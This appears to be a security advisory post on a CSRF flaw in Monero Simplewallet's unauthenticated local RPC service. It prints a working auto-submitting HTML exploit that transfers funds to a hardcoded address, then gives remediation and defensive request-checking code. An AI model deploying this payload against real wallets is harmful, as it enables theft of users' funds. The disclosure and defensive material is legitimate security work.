CSRF Vulnerability Allows for Remote Compromise of Monero Wallets

in #monero, 8 years ago

 

Description:

Monero is a private, untraceable cryptocurrency. In recent weeks it has gained a lot of publicity and has risen in value significantly. It is the second most traded cryptocurrency this month after Bitcoin.
A Cross Site Request Forgery vulnerability was discovered in Monero Simplewallet that could give attackers the ability to remotely steal Monero from users running vulnerable wallets. Monero users must take action and update their wallets to protect themselves against this attack.


Vulnerable Wallets:

The following wallets use Simplewallet in RPC mode and therefore are vulnerable to this attack: 

*Note: This is not an exhaustive list; it is likely that more wallets will be affected by this issue.


Impact:

An attacker could exploit this vulnerability to steal Monero from vulnerable wallets. This would involve only a minimal amount of social engineering: the attacker has to direct users to a webpage hosting the exploit.


Cause:

Monero Simplewallet hosts an RPC web service on localhost, port 18082. The web service requires no authentication to initiate functions such as making payments, and it can be compromised through a Cross Site Request Forgery attack.

Cross Site Request Forgery is an attack that forces a user's browser to execute unwanted actions against web applications or web services they are authenticated with. In this case, by directing a user to a malicious web page, an attacker could make a payment from the user's wallet to their own wallet.

Third party wallets were found to use Simplewallet in RPC mode, making the majority of third party wallets vulnerable to this attack too.


Exploit:

The script below performs a Cross Site Request Forgery (CSRF) attack that would automatically steal Monero from the wallet of any user who visited the webpage.


 
<html>  
    <form action=http://127.0.0.1:18082/json_rpc method=post enctype="text/plain" name="pay" >  
        <input name='{"jsonrpc":"2.0","id":"0","method":"transfer","params":{"destinations":[{"amount":100000000000,"address":"49FuXtv95dkZj5aDaoWkbjQRv9Qu6UMwAAJKP68vksbpRJEPNZfkr6Ecbj9wrqG4xHAiMArmpGsxRbkmxAC8NEydBEvc162"}],"fee":000000000000,"mixin":3,"unlock_time":0,"payment_id":"","get_tx_key":true}}' type='hidden'>  
    </form>  
    <script>
         document.pay.submit()
    </script>
</html>  


 

Remedial Action:

The vendor has released a hotfix for this vulnerability. It is important that Monero users update their versions of Monero immediately. Users of third party offline wallets are unlikely to have a patch available yet, so it is recommended that they transfer their funds out of third party wallets into a secure wallet, such as the updated version of Simplewallet (https://github.com/monero-project/monero/releases/tag/v0.10.0).
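
For developers of wallets that expose a local RPC service, the following added example (not Monero's hotfix and not code from this post) shows a request gate that refuses the unauthenticated text/plain form post described under Cause. The function names, the bearer-token scheme and the allowlists are assumptions; only the port comes from this page.

```javascript
// Added example (not Monero code): gate for a loopback JSON-RPC listener.
// All names here are hypothetical; the port is the one named on this page.
const ALLOWED_HOSTS = new Set(["127.0.0.1:18082", "localhost:18082"]);
const ALLOWED_ORIGINS = new Set(); // no web origin may call the wallet RPC

// Compare every character so timing does not reveal a matching prefix.
function sameSecret(a, b) {
  let diff = a.length ^ b.length;
  for (let i = 0; i < a.length; i++) {
    diff |= a.charCodeAt(i) ^ b.charCodeAt(i % b.length);
  }
  return diff === 0;
}

// headers: lower-cased names, as Node's http module exposes them.
// token: per-install secret the legitimate client sends (assumption).
function checkRpcRequest(method, headers, token) {
  if (method !== "POST") return { ok: false, status: 405, reason: "method" };
  // DNS rebinding defence: Host must name the loopback listener.
  if (!ALLOWED_HOSTS.has(headers["host"] || "")) {
    return { ok: false, status: 403, reason: "host" };
  }
  // Current browsers attach Origin to cross-site form POSTs; native clients send none.
  const origin = headers["origin"];
  if (origin !== undefined && !ALLOWED_ORIGINS.has(origin)) {
    return { ok: false, status: 403, reason: "origin" };
  }
  // An HTML form can only send text/plain, urlencoded or multipart bodies.
  const type = (headers["content-type"] || "").split(";")[0].trim().toLowerCase();
  if (type !== "application/json") {
    return { ok: false, status: 415, reason: "content-type" };
  }
  // A form post cannot set an Authorization header.
  const auth = headers["authorization"] || "";
  if (!token || !sameSecret(auth, "Bearer " + token)) {
    return { ok: false, status: 401, reason: "auth" };
  }
  return { ok: true, status: 200, reason: "accepted" };
}

// Constructed sample requests (headers only), not captured traffic.
const SAMPLES = {
  formPost: { host: "127.0.0.1:18082", origin: "http://evil.example", "content-type": "text/plain" },
  formPostNoOrigin: { host: "127.0.0.1:18082", "content-type": "text/plain" },
  rebound: { host: "evil.example:18082", "content-type": "application/json" },
  wallet: { host: "127.0.0.1:18082", "content-type": "application/json", authorization: "Bearer s3cret-constructed" },
};
for (const [name, h] of Object.entries(SAMPLES)) {
  console.log(name, checkRpcRequest("POST", h, "s3cret-constructed").reason);
}
```

Each check fails closed on its own, so a browser that omits Origin is still stopped by the content-type and authentication checks.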